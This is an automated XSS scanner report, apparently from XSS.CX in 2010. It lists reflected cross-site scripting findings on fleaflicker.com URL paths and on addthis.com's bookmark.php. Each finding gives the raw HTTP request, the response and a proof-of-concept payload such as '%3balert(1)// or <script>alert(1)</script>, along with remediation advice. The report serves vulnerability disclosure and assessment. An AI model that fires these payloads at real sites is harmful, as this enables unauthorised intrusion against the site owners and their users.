GET /nfl99f59'%3balert(1)//f2a4a9d583b/news?tableOffset=7 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4753 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e40'%3balert(1)//1e74970d2ee was submitted in the REST URL parameter 2. This input was echoed as 87e40';alert(1)//1e74970d2ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/news87e40'%3balert(1)//1e74970d2ee?tableOffset=7 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:38 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4767 Keep-Alive: timeout=5, max=34 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de495'%3balert(1)//9b7d4be09ac was submitted in the REST URL parameter 1. This input was echoed as de495';alert(1)//9b7d4be09ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nflde495'%3balert(1)//9b7d4be09ac/news-item HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:25 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4758 Keep-Alive: timeout=5, max=72 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 311e9'%3balert(1)//03673b1a4b0 was submitted in the REST URL parameter 2. This input was echoed as 311e9';alert(1)//03673b1a4b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/news-item311e9'%3balert(1)//03673b1a4b0 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:26 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4772 Keep-Alive: timeout=5, max=2 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40191'%3balert(1)//80a7ddc276d was submitted in the REST URL parameter 1. This input was echoed as 40191';alert(1)//80a7ddc276d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl40191'%3balert(1)//80a7ddc276d/player HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:26 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4755 Keep-Alive: timeout=5, max=63 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e2e7'%3balert(1)//ce6f65c5085 was submitted in the REST URL parameter 2. This input was echoed as 6e2e7';alert(1)//ce6f65c5085 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/player6e2e7'%3balert(1)//ce6f65c5085 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:29 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4769 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6dc'%3balert(1)//93e089e2b40 was submitted in the REST URL parameter 1. This input was echoed as 9e6dc';alert(1)//93e089e2b40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl9e6dc'%3balert(1)//93e089e2b40/scores HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:34 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4755 Keep-Alive: timeout=5, max=3 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 792f9'%3balert(1)//26706f04041 was submitted in the REST URL parameter 2. This input was echoed as 792f9';alert(1)//26706f04041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/scores792f9'%3balert(1)//26706f04041 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:37 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4769 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a6ba'%3balert(1)//742424c0741 was submitted in the REST URL parameter 1. This input was echoed as 1a6ba';alert(1)//742424c0741 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl1a6ba'%3balert(1)//742424c0741/signup HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:34 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4755 Keep-Alive: timeout=5, max=8 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6ec7'%3balert(1)//f65cf9f44c2 was submitted in the REST URL parameter 2. This input was echoed as f6ec7';alert(1)//f65cf9f44c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/signupf6ec7'%3balert(1)//f65cf9f44c2 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:35 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4769 Keep-Alive: timeout=5, max=44 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8625'%3balert(1)//fbb77ca826c was submitted in the REST URL parameter 1. This input was echoed as c8625';alert(1)//fbb77ca826c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nflc8625'%3balert(1)//fbb77ca826c/world-rankings HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4763 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 693b2'%3balert(1)//130414cddf5 was submitted in the REST URL parameter 2. This input was echoed as 693b2';alert(1)//130414cddf5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/world-rankings693b2'%3balert(1)//130414cddf5 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:37 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4777 Keep-Alive: timeout=5, max=39 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc173'%3balert(1)//2050295951 was submitted in the REST URL parameter 1. This input was echoed as dc173';alert(1)//2050295951 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhldc173'%3balert(1)//2050295951/most-added-dropped HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:22 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4766 Keep-Alive: timeout=5, max=42 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaa54'%3balert(1)//906908e509f was submitted in the REST URL parameter 2. This input was echoed as eaa54';alert(1)//906908e509f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl/most-added-droppedeaa54'%3balert(1)//906908e509f HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:23 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4812 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63256'%3balert(1)//0577bdcebd3 was submitted in the REST URL parameter 1. This input was echoed as 63256';alert(1)//0577bdcebd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl63256'%3balert(1)//0577bdcebd3/news HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:59 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4753 Keep-Alive: timeout=5, max=9 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dc07'%3balert(1)//265bd265ac0 was submitted in the REST URL parameter 2. This input was echoed as 3dc07';alert(1)//265bd265ac0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl/news3dc07'%3balert(1)//265bd265ac0 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4798 Keep-Alive: timeout=5, max=52 Connection: Keep-Alive
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 94d3e<script>alert(1)</script>25b5f647a99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Referer: http://www.google.com/search?hl=en&q=94d3e<script>alert(1)</script>25b5f647a99
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 18:19:23 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92194
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>94d3e<script>alert(1)</script>25b5f647a99 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b45"><script>alert(1)</script>aa36591d24d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Referer: http://www.google.com/search?hl=en&q=c3b45"><script>alert(1)</script>aa36591d24d
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 18:19:22 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=c3b45"><script>alert(1)</script>aa36591d24d" /> ...[SNIP]...
Report generated by XSS.CX at Thu Dec 16 13:30:09 EST 2010.